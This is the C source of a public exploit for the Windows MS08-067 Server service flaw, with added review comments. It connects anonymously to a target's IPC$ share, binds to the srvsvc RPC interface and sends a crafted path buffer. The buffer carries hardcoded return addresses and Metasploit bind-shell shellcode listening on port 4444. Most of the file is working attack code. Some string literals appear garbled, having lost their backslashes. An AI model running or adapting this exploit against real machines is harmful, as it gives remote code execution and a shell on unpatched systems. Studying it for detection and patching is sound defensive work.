MS08-067.c

  1. #include <winsock2.h>
  2. #include <windows.h>
  3. #include <stdio.h>
  4. #include <io.h>
  5. #include <fcntl.h>
  6. #include <memory.h>
  7. #include <wchar.h>
  8. #include "srvsvc.h"
  9. #include "srvsvc_c.c"
  10. #include "mem.h"
  11. #pragma comment(lib,"ws2_32")
  12. #pragma comment(lib,"mpr")
  13. #pragma comment(lib,"rpcrt4.lib")
  14. #pragma comment(lib,"MSVCRT.LIB")
/* Absolute addresses that MakeBuff() copies into the crafted buffer.
 * They are fixed constants for one specific OS build; nothing in this file
 * computes, looks up or verifies them, so the PoC applies only to that
 * build. dwJmpAddr is one byte below dwRetAddr. */
DWORD dwRetAddr = 0x7ffa0eb8;
DWORD dwJmpAddr = 0x7ffa0eb7;
  17. /* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
  18. unsigned char sc[] =
  19. "x83xECx70" // sub esp, 0x70
  20. "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xad"
  21. "x07xe6x4ax83xebxfcxe2xf4x51x6dx0dx07x45xfex19xb5"
  22. "x52x67x6dx26x89x23x6dx0fx91x8cx9ax4fxd5x06x09xc1"
  23. "xe2x1fx6dx15x8dx06x0dx03x26x33x6dx4bx43x36x26xd3"
  24. "x01x83x26x3exaaxc6x2cx47xacxc5x0dxbex96x53xc2x62"
  25. "xd8xe2x6dx15x89x06x0dx2cx26x0bxadxc1xf2x1bxe7xa1"
  26. "xaex2bx6dxc3xc1x23xfax2bx6ex36x3dx2ex26x44xd6xc1"
  27. "xedx0bx6dx3axb1xaax6dx0axa5x59x8exc4xe3x09x0ax1a"
  28. "x52xd1x80x19xcbx6fxd5x78xc5x70x95x78xf2x53x19x9a"
  29. "xc5xccx0bxb6x96x57x19x9cxf2x8ex03x2cx2cxeaxeex48"
  30. "xf8x6dxe4xb5x7dx6fx3fx43x58xaaxb1xb5x7bx54xb5x19"
  31. "xfex54xa5x19xeex54x19x9axcbx6fxf7x16xcbx54x6fxab"
  32. "x38x6fx42x50xddxc0xb1xb5x7bx6dxf6x1bxf8xf8x36x22"
  33. "x09xaaxc8xa3xfaxf8x30x19xf8xf8x36x22x48x4ex60x03"
  34. "xfaxf8x30x1axf9x53xb3xb5x7dx94x8exadxd4xc1x9fx1d"
  35. "x52xd1xb3xb5x7dx61x8cx2excbx6fx85x27x24xe2x8cx1a"
  36. "xf4x2ex2axc3x4ax6dxa2xc3x4fx36x26xb9x07xf9xa4x67"
  37. "x53x45xcaxd9x20x7dxdexe1x06xacx8ex38x53xb4xf0xb5"
  38. "xd8x43x19x9cxf6x50xb4x1bxfcx56x8cx4bxfcx56xb3x1b"
  39. "x52xd7x8exe7x74x02x28x19x52xd1x8cxb5x52x30x19x9a"
  40. "x26x50x1axc9x69x63x19x9cxffxf8x36x22x42xc9x06x2a"
  41. "xfexf8x30xb5x7dx07xe6x4a";
  42. int MakeBuff(char *Buff,int BufLen);
  43. void Usage(char *ProgName);
  44. int WaitExit();
  45. #define CN 0
  46. #define TW 1
/*
 * Entry point. Given one argument <Server>, it (1) opens an IPC$ session on
 * the target with empty credentials, (2) binds to the srvsvc RPC interface
 * over a named pipe, and (3) issues an RPC call whose path argument is the
 * buffer built by MakeBuff(). Per the file title this is a public PoC for
 * MS08-067, which the vendor patch fixed; from a defender's side the useful
 * content is the traffic shape it produces: an anonymous IPC$ connection
 * followed by a srvsvc call carrying an oversized, '..'-laden path.
 *
 * Non-standard: main returns void; the file targets MSVC.
 *
 * Resource handling defects visible here: the IPC$ connection made by
 * WNetAddConnection2 is never cancelled on any path, and the early returns
 * after RpcStringBindingCompose / RpcBindingFromStringBinding / the RPC
 * exception skip RpcStringFree and RpcBindingFree.
 *
 * NOTE(review): many literals in this listing contain a bare 'n' where a
 * "\n" escape would be expected, and the path literals look like they lost
 * their backslashes in extraction; the strings are reproduced as printed.
 */
void main(int argc, char *argv[])
{
NETRESOURCE lpNetResource;
/* Both left all-zero: the share is opened with empty user and password,
 * i.e. a null/anonymous session. */
char Username[256] = {0};
char Password[256] = {0};
DWORD Ret = 0;
RPC_STATUS status;
unsigned char * pszUuid = NULL;
/* Named-pipe transport; pszNetworkAddress is pointed at Server below. */
unsigned char * pszProtocolSequence = "ncacn_np";
unsigned char * pszNetworkAddress = "";
/* Pipe endpoint the srvsvc binding is made on (separators garbled here). */
unsigned char pszEndpoint[100] = "\pipe\browser";
unsigned char * pszOptions = NULL;
unsigned char * pszStringBinding = NULL;
char Server[256] = {0};
char RemoteName[256] = {0};
/* Payload buffer handed to MakeBuff(); zeroed by memset before use. */
char Buff[0x700];
/* Output buffer for the RPC call (pBuff2 is assigned but not used). */
char Buff2[1000] = {0};
char *pBuff2 = (char *)&Buff2;
/* Holds the single DWORD passed by pointer to func1f. */
char Buff3[100] = {0};
int BufLen = 0;
// int i;
/* Both flags are set but never read in this function. */
int ForceAttack = 0;
int AntiDEP = 0;
int nLanguage = 0;
DWORD dwID = 0;
if(argc != 2)
{
Usage(argv[0]);
return;
}
/* Unbounded copy of argv[1] into a 256-byte buffer; the only length check
 * (below) runs after the copy and only rejects the empty string. */
strcpy(Server,argv[1]);
sprintf(RemoteName,"\\%s\IPC$",Server);
pszNetworkAddress = Server;
if(strlen(Server) == 0)
{
Usage(argv[0]);
return;
}
printf("nMS08-067 Exploit for CN by EMM@ph4nt0m.orgnn");
lpNetResource.dwScope=RESOURCE_CONNECTED;
lpNetResource.dwType =RESOURCETYPE_DISK;
lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
lpNetResource.lpLocalName=NULL;
lpNetResource.lpRemoteName = RemoteName;
lpNetResource.lpComment=NULL;
lpNetResource.lpProvider=NULL;
/* Anonymous connection to \\Server\IPC$. Ret already carries the error
 * code returned by the API; the message below reports GetLastError()
 * instead, which may not match. */
Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
if(Ret != NO_ERROR)
{
printf("Make SMB Connection error:%dn",GetLastError());
return;
}
printf("SMB Connect OK!n");
status = RpcStringBindingCompose(pszUuid,
pszProtocolSequence,
pszNetworkAddress,
pszEndpoint,
pszOptions,
&pszStringBinding);
if(status != RPC_S_OK)
{
/* Returns without cancelling the IPC$ connection made above. */
return;
}
/* srvsvc__MIDL_AutoBindHandle is presumably the auto-bind handle from the
 * generated stub in srvsvc_c.c — confirm there. */
status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
if(status != RPC_S_OK)
{
/* Leaks pszStringBinding and the IPC$ connection. */
return;
}
   RpcTryExcept
    {
/* func23 / func1f are MIDL-generated stubs (srvsvc_c.c / srvsvc.h); their
 * real operation names cannot be determined from this file. The byte
 * strings cast to wchar_t* are passed exactly as written. */
func23(L"ph4nt0m",(wchar_t *)"x53x00x56x89x56x89x56x89x56x89",(wchar_t *)"x4Dx00x56x89x56x89",4,0);
memset(Buff,0,sizeof(Buff));
BufLen = MakeBuff(Buff,sizeof(Buff));
/* Watchdog: WaitExit() terminates the process after five seconds whether
 * or not the RPC call below ever returns. Its handle is not closed. */
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
/* Cast on an lvalue is an MSVC extension, not standard C; this stores
 * the 32-bit value 1 in the first four bytes of Buff3. */
(DWORD)*(DWORD *)Buff3 = 1;
/* The call that delivers Buff. Buff is passed as a wide string and Buff2
 * (1000 bytes) as the output buffer; BufLen itself is not passed. */
func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);
    }
    RpcExcept ( 1 )
    {
        status = RpcExceptionCode();
/* 1726 is RPC_S_CALL_FAILED: the call not coming back is treated as the
 * expected outcome and silently ignored. Any other exception code is
 * printed and main returns without the RPC cleanup below. */
if(status == 1726)
{
}
else
{
printf("RpcExceptionCode() = %urn", status );
return;
}
    }
    RpcEndExcept
//*/
/* Reached only when the RPC call returned normally or raised 1726. */
printf("Maybe Patched!n");
    RpcStringFree( &pszStringBinding );
    RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
return;
}
  144. #define JMPPOINT "B041"
/*
 * Assembles the path argument sent by main() into the caller's buffer.
 * Layout, in write order: 4-byte filler tokens "B000", "B001", ... up to
 * (not including) JMPPOINT; a wide-character prefix copied over the start
 * of the buffer; six copies of dwRetAddr; dwJmpAddr; four 0x48 bytes; the
 * sc[] byte array (without its terminator); the marker "EMM!"; and finally
 * two zero bytes at a fixed offset.
 *
 * @param Buff   destination buffer, at least 0x700 bytes as used by main()
 * @param BufLen size of Buff in bytes
 * @return number of bytes written sequentially (the fixed-offset memset
 *         is not counted)
 *
 * Only the filler loop is bounded by BufLen; every append after it and the
 * final memset at offset 0x206 * 2 are unconditional, so a BufLen smaller
 * than what main() passes would write past the end of Buff.
 */
int MakeBuff(char *Buff, int BufLen)
{
int len = 0;
/* 5 bytes: "B%03d" is 4 characters plus the terminator for i < 1000. */
char tmp[5] = {0};
int i;
for(i = 0; i < BufLen/4; i++)
{
memset(tmp,0,4);
sprintf(tmp,"B%03d",i);
//*
/* Stop once the token matches JMPPOINT; len then fixes where the
 * addresses below land. */
if(memcmp(tmp,JMPPOINT,4) == 0)
{
break;
}
//*/
memcpy(Buff + len,tmp,4);
len += 4;
}
/* Overwrites the first 13 wchar_t of the buffer with the wide prefix.
 * NOTE(review): the separators in this literal look garbled in this
 * listing; the literal must actually be at least 13 wchar_t long or the
 * copy reads past it. */
memcpy(Buff,L".\\a\..\..\NN",13*2);
for(i = 0; i < 6; i++)
{
memcpy(Buff + len,&dwRetAddr,4);
len += 4;
}
memcpy(Buff + len,&dwJmpAddr,4);
len += 4;
memset(Buff + len,0x48,0x4);
len += 4;
/* sizeof(sc) - 1 drops the string literal's NUL terminator. */
memcpy(Buff + len,sc,sizeof(sc) - 1);
len += sizeof(sc) - 1;
memcpy(Buff + len,"EMM!",4);
len += 4;
/* Unconditional write at byte offset 0x40c, independent of len/BufLen. */
memset(Buff + 0x206 * 2,0,2);
return len;
}
/*
 * Prints the usage banner to stdout.
 *
 * @param ProgName program name (argv[0]); substituted into the banner.
 *
 * NOTE(review): the bare 'n' characters in the literal look like "\n"
 * escapes that lost their backslash in this listing; the string is
 * reproduced exactly as printed.
 */
void Usage(char *ProgName)
{
fprintf(stdout, "n MS08-067 Exploit for CN by EMM@ph4nt0m.orgnn %s <Server>nn", ProgName);
}
/*
 * Watchdog thread body, started by main() via CreateThread. Waits five
 * seconds, prints a status line and terminates the whole process, so the
 * program never blocks indefinitely on an RPC call that does not return.
 *
 * @return 0 in principle; never actually reached because ExitProcess does
 *         not return.
 */
int WaitExit()
{
const unsigned long delay_ms = 5 * 1000;
Sleep(delay_ms);
fputs("Send Payload Over!n", stdout);
ExitProcess(0);
return 0;
}
  191. }